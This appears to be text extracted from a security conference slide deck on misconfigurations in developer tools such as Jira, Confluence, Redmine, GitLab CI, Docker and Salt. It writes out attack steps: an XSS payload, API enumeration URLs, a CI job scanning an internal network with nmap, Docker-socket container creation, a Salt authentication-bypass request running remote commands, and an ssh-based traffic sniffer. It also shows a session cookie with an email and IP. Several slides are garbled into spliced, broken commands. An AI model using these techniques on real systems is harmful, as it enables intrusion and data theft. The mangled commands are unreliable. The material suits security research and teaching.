MISCONFIGURATION IN THE DEVELOPER INFRASTRUCTURE MOROZOV ALEXEY Security myth destroyer What is Misconfiguration? 1) Logical bugs that were allowed as a result of developer negligence (comments left, wired creeds, test functionality) 2) Incorrectly configured hardware configuration or infrastructure services. 3) Insufficient control of access rights. 4) Nobody knows for sure. Application solutions: • Task management systems: Jira, Redmine, Scrum – доски прочее • Continuous integration systems: TeamCity, GitLab Ci, Jenkins; • Bugtrack systems • Containers: docker/lxc; • Wiki-systems • Monitoring and control systems Task Manager systems • Jira • Confluence • Redmine • Agile boards • IDE extensions • ….other Jira Vulnerabilities • Stack trace: https://jira.<company_name>.ru/rest/api/2/[]/ • Port managment: 8000 – 8100 • Reading private panel • Jira CSRF (X-Atlassian-Token: nocheck) • Blind jql Jira – Stacktrace Jira – Agile board Agile board https://jira.<company_name>.ru/ secure/ManageRapidViews.jspa Agile board https://jira.<company_name>.ru/secure/RapidBoard. jspa?rapidView=434 Agile board https://jira.<company_name>.ru/secure/RapidBoard. jspa?rapidView=435 Blind JQL • https://<company_name>/jira/rest/api/2/mypermissions • https://<company_name>/jira/rest/api/2/issue/1 • https://<company_name>/jira/rest/api/2/search?jql=status% 3Dopen and description ~ "12345*" Blind JQL https://<company_name>/jira/rest/api/2/search?jql=description =“kdhfbwk" https://<company_name>/jira/rest/api/2/search?jql=descriprion ="123*" and id=10000 Blind JQL When not working? Confluence - Vulnerabilities • StackTrace: https://confluence.<company_name>.ru/rest/api/cont ent/[]/ • Reading open spaces without authorization • Blind сql Confluence - StackTrace Reading open spaces • https://confluence.ru/rest/api/space • https://confluence.ru/rest/api/content/ • https://confluence.ru/rest/api/space/{SPACEKEY} • https://confluence.ru/rest/api/content/{ContentI} Reading open spaces Blind CQL api/content/search?cql=space.title~"s.*" Redmine Redmine - XSS Redmine - XSS Redmine - XSS !l(“ onerror=alert(/1/))! Redmine - XSS Redmine – basic.Php Worksection broken auth Worksection broken auth Asana Asana – broken session soft_signup_user_id=5166376; soft_signup_email=hac126%40mail.ru; xi_ip=97.12.23.123; soft_signup_invitation_token=numeric_token-5166375- 672796; gtm_u_id=5166376; dapulseUserId=5166375; gtm_u_is_admin=true; gtm_a_paying_value=0.0; Asana – broken session HiTask HiTask-XSS HiTask-LFI HiTask-LFI HiTask-LFI TFS TFS TEAMCITY - guest TEAMCITY - guest TEAMCITY - guest TEAMCITY - guest DOCKER/LXD API docker run -v /var/run/docker.sock:/var/run/docker.sock debian ls curl --unix-socket /var/run/docker.sock http://<ip>/new LXD API – PORT 8443 curl -s --unix-socket /var/lib/lxd/unix.socket a/1.0/containers/ { "type": "async", "status": "Operation created", "status_code": 100, "metadata": { "id": "439bf4a1-e056-4b76-86ad-bff06169fce1", "class": "task", "created_at": "2016-04-18T22:56:22.590239576 GIT-LAB • Intercept source code • API • Enumeration keys • https://gitlab.rambler.ru/al.morozov.keys GIT-LAB 1) Create file with name .gitlab-ci.yml for scan internal network. job1: script: - ifconfig 2) Scan 2375 port GIT-LAB job1: script: - nmap 10.234.0.3/16 –P0 –p 2375 –n –-open –- min-rate=300 GIT-LAB job1: script: - nmap 10.234.0.3/16 –P0 –p 2375 –n –-open –- min-rate=300 GIT-LAB job1: script: - ip addr - ps aux - curl -s --unix-socket /var/run/docker.sock http:/containers/json GIT-LAB GIT-LAB curl -s --unix-socket /var/run/docker.sock "http:/containers/create?name=72701f424a15661108227ea65 a0548dbcbf6f5343207b050431980b71af7f7ec" -X POST -H "Content-Type: application/json" -d '{"Cmd": [ "ls", "-la", "./" ]}' GIT-LAB GitLab (API) - snippets • https://gitlab.test.ru/explore/snippets • https://gitlab/snippets/648 GitLab (API) - projects • 1) https://gitlab/api/v4/projects • 2) wfuzz -c -z range,1-10000 --sc=200 https://gitlab/api/v4/projects/FUZZ GitLab (API) - projects GitLab (API) - users https://gitlab/api/v4/users/ https://gitlab/api/v4/users/2 GitLab (API) - users https://<host>/<user>.keys Sentry Sentry Sentry Salt –Auth ByPass API (0 d.) CVE-2018-15751 curl -si POST https://<host>.ru/login -H "Accept: application/json" -d username="<LDAP LOGIN>" -d password="s" -d eauth='ldap' Salt –Auth ByPass API (0 d.) CVE-2018-15751 curl -si POST https://<host>.ru/login -H "Accept: application/json" -d username="<LDAP LOGIN>" -d password="s" -d eauth='ldap' Salt –Auth ByPass API (0 d.) CVE-2018-15751 curl -isi -H POST 'X-Auth-Token: https://<host>.ru/login -H "Accept: 694a7dfa16.........cacfcb0d26650d21bd'application/json" -d username="<LDAP LOGIN>" -d https://<host>/keyspassword="s" -d eauth ='ldap' Salt –Auth ByPass API (0 d.) CVE-2018-15751 Salt –Auth ByPass API (0 d.) CVE-2018-15751 curl -isi -H POST 'X-Auth-Token: https://<host>.ru/login -H "Accept: 694a7dfa16.........cacfcb0d26650d21bd'application/json694a7dfa168........cfcb0d26650d21bd'" -d username="<LDAP -H LOGIN>" 'Content-type: -d https://<host>/keyspassword="s"application/json' -d eauthhttps://<host>/ ='ldap' -d '[{"client":"local", "tgt":"*", "fun":"cmd.run", "kwarg":{"cmd":"id"}, "eauth":"auto"}]' Salt –Auth ByPass API (0 d.) CVE-2018-15751 ARM sniffer Given: Device within the network and access to it Task: Sniff traffic from this device. Restrictions: Can’t upload file 1mb disk size Not root ARM sniffer curlmount -isi -H root_fs_arm.ext2POST 'X-Auth-Token: https://<host>.ru/login /opt/arm -H "Accept: 694a7dfa16.........cacfcb0d26650d21bd'application/jsonapt-get694a7dfa168........cfcb0d26650d21bd' install qemu" -d username="<LDAPqemu-user-static -H LOGIN>" 'Content-type: -d https://<host>/keyspassword="s"cdapplication/json' /opt/arm -d eauthhttps://<host>/ ='ldap' -d '[{"client":"local", sudo"tgt":"*", cp /usr/bin/qemu- "fun":"cmd.run",arm "kwarg":{"cmd":"id"},-static ./usr/bin/ chroot"eauth":"auto ./ /usr/bin/qemu-arm-static"}]‘ /bin/sh gcc sniff.c -static ARM sniffer cat socket | ssh -o KexAlgorithms=diffie-hellman-group1- sha1 -o Ciphers=+3des-cbc -o MACs=+hmac-sha1 ADMIN@<HOST>"echo - > /var/snif" sshpass -p ADMIN ssh -o KexAlgorithms=diffie-hellman- group1-sha1 -o Ciphers=+3des-cbc -o MACs=+hmac-sha1 ADMIN@<SERVER> /var/socket_tcp | cat - > tcp_log & ARM sniffer IPAM curlhttps://<host>/<user>.keys –X POST https://<host>/api/v1/ip/<IP>/21?dns=true + 3 BONUS KEYS Rambler – Broken Access Control Rambler – Broken Access Control Antichat – Similar threads VoiceCards – Free calls VoiceCards – Free calls VoiceCards – Free calls Thank you for attention .